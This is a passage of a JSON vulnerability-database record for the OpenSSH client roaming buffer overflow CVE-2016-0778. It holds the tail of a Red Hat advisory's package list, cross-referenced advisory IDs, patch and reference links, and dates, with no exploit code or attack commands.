7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-0778"
},
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "PACKETSTORM",
"id": "135250"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "PACKETSTORM",
"id": "135283"
},
{
"db": "PACKETSTORM",
"id": "135263"
}
],
"trust": 3.33
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-0778",
"trust": 4.3
},
{
"db": "BID",
"id": "80698",
"trust": 2.1
},
{
"db": "JUNIPER",
"id": "JSA10734",
"trust": 2.1
},
{
"db": "CERT/CC",
"id": "VU#456088",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "135273",
"trust": 1.9
},
{
"db": "SECTRACK",
"id": "1034671",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2016/01/14/7",
"trust": 1.8
},
{
"db": "SIEMENS",
"id": "SSA-412672",
"trust": 1.8
},
{
"db": "JVN",
"id": "JVNVU95595627",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97668313",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250",
"trust": 0.7
},
{
"db": "JUNIPER",
"id": "JSA10774",
"trust": 0.3
},
{
"db": "SEEBUG",
"id": "SSVID-90447",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-88288",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-22-349-21",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-0778",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135250",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135259",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "136346",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135283",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135263",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "PACKETSTORM",
"id": "135250"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "PACKETSTORM",
"id": "135283"
},
{
"db": "PACKETSTORM",
"id": "135263"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"id": "VAR-201601-0030",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-88288"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T20:39:22.908000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002",
"trust": 0.8,
"url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
},
{
"title": "HT206167",
"trust": 0.8,
"url": "https://support.apple.com/en-us/ht206167"
},
{
"title": "HT206167",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/ht206167"
},
{
"title": "HPSBGN03638",
"trust": 0.8,
"url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375"
},
{
"title": "AXSA:2016-037:01",
"trust": 0.8,
"url": "https://tsn.miraclelinux.com/ja/node/6397"
},
{
"title": "release-7.1p2",
"trust": 0.8,
"url": "http://www.openssh.com/txt/release-7.1p2"
},
{
"title": "Oracle Solaris Third Party Bulletin - October 2015",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
},
{
"title": "Oracle Linux Bulletin - January 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
},
{
"title": "UTM Up2Date 9.354 released",
"trust": 0.8,
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"title": "UTM Up2Date 9.319 released",
"trust": 0.8,
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"title": "OpenSSH Remediation measures for denial of service vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59597"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/"
},
{
"title": "Ubuntu Security Notice: openssh vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1"
},
{
"title": "Debian Security Advisories: DSA-3446-1 openssh -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69"
},
{
"title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8"
},
{
"title": "Amazon Linux AMI: ALAS-2016-638",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638"
},
{
"title": "Red Hat: CVE-2016-0778",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0778"
},
{
"title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83"
},
{
"title": "puppet-module-ssh",
"trust": 0.1,
"url": "https://github.com/ghoneycutt/puppet-module-ssh "
},
{
"title": "fabric2",
"trust": 0.1,
"url": "https://github.com/winstonn/fabric2 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/cpcloudnl/ssh-config "
},
{
"title": "Linux_command_crash_course",
"trust": 0.1,
"url": "https://github.com/akshayprasad/linux_command_crash_course "
},
{
"title": "nmap",
"trust": 0.1,
"url": "https://github.com/project7io/nmap "
},
{
"title": "DC-2-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough "
},
{
"title": "DC-1-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough "
},
{
"title": "satellite-host-cve",
"trust": 0.1,
"url": "https://github.com/redhatsatellite/satellite-host-cve "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.openssh.com/txt/release-7.1p2"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/80698"
},
{
"trust": 2.4,
"url": "http://www.debian.org/security/2016/dsa-3446"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html"
},
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
},
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
},
{
"trust": 1.9,
"url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt"
},
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/201601-01"
},
{
"trust": 1.9,
"url": "http://www.ubuntu.com/usn/usn-2869-1"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded"
},
{
"trust": 1.8,
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"trust": 1.8,
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"trust": 1.8,
"url": "https://bto.bluecoat.com/security-advisory/sa109"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht206167"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/jan/44"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2016/01/14/7"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1034671"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html"
},
{
"trust": 1.7,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734"
},
{
"trust": 1.6,
"url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733"
},
{
"trust": 1.2,
"url": "https://www.kb.cert.org/vuls/id/456088"
},
{
"trust": 1.1,
"url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig"
},
{
"trust": 1.1,
"url": "http://www.ubuntu.com/usn/usn-2869-1/"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/articles/2123781"
},
{
"trust": 0.8,
"url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777"
},
{
"trust": 0.8,
"url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/"
},
{
"trust": 0.8,
"url": "https://security-tracker.debian.org/tracker/cve-2016-0778"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu95595627/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu97668313"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0778"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777"
},
{
"trust": 0.4,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html"
},
{
"trust": 0.3,
"url": "http://www.openssh.com"
},
{
"trust": 0.3,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.3,
"url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss"
},
{
"trust": 0.3,
"url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319"
},
{
"trust": 0.3,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138"
},
{
"trust": 0.3,
"url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc"
},
{
"trust": 0.3,
"url": "https://securityadvisories.paloaltonetworks.com/home/detail/44"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044"
},
{
"trust": 0.3,
"url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109"
},
{
"trust": 0.1,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://github.com/ghoneycutt/puppet-module-ssh"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.4"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.4"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.9p1-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.8"
},
{
"trust": 0.1,
"url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/14.html"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/244.html"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659"
},
{
"trust": 0.1,
"url": "https://gpgtools.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht206171"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0777"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0778"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0777"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "PACKETSTORM",
"id": "135250"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "PACKETSTORM",
"id": "135283"
},
{
"db": "PACKETSTORM",
"id": "135263"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "PACKETSTORM",
"id": "135250"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "PACKETSTORM",
"id": "135283"
},
{
"db": "PACKETSTORM",
"id": "135263"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#456088"
},
{
"date": "2016-01-14T00:00:00",
"db": "VULHUB",
"id": "VHN-88288"
},
{
"date": "2016-01-14T00:00:00",
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"date": "2016-01-14T00:00:00",
"db": "BID",
"id": "80698"
},
{
"date": "2016-01-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"date": "2016-01-14T17:27:54",
"db": "PACKETSTORM",
"id": "135250"
},
{
"date": "2016-01-15T02:09:54",
"db": "PACKETSTORM",
"id": "135273"
},
{
"date": "2016-01-15T00:03:14",
"db": "PACKETSTORM",
"id": "135259"
},
{
"date": "2016-03-22T15:18:02",
"db": "PACKETSTORM",
"id": "136346"
},
{
"date": "2016-01-18T04:26:08",
"db": "PACKETSTORM",
"id": "135283"
},
{
"date": "2016-01-15T00:04:21",
"db": "PACKETSTORM",
"id": "135263"
},
{
"date": "2016-01-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"date": "2016-01-14T22:59:02.280000",
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-20T00:00:00",
"db": "CERT/CC",
"id": "VU#456088"
},
{
"date": "2022-12-13T00:00:00",
"db": "VULHUB",
"id": "VHN-88288"
},
{
"date": "2022-12-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"date": "2017-01-23T03:06:00",
"db": "BID",
"id": "80698"
},
{
"date": "2016-10-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"date": "2022-12-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"date": "2022-12-13T12:15:19.253000",
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow",
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
}
],
"trust": 0.6
}
}
VAR-200309-0035
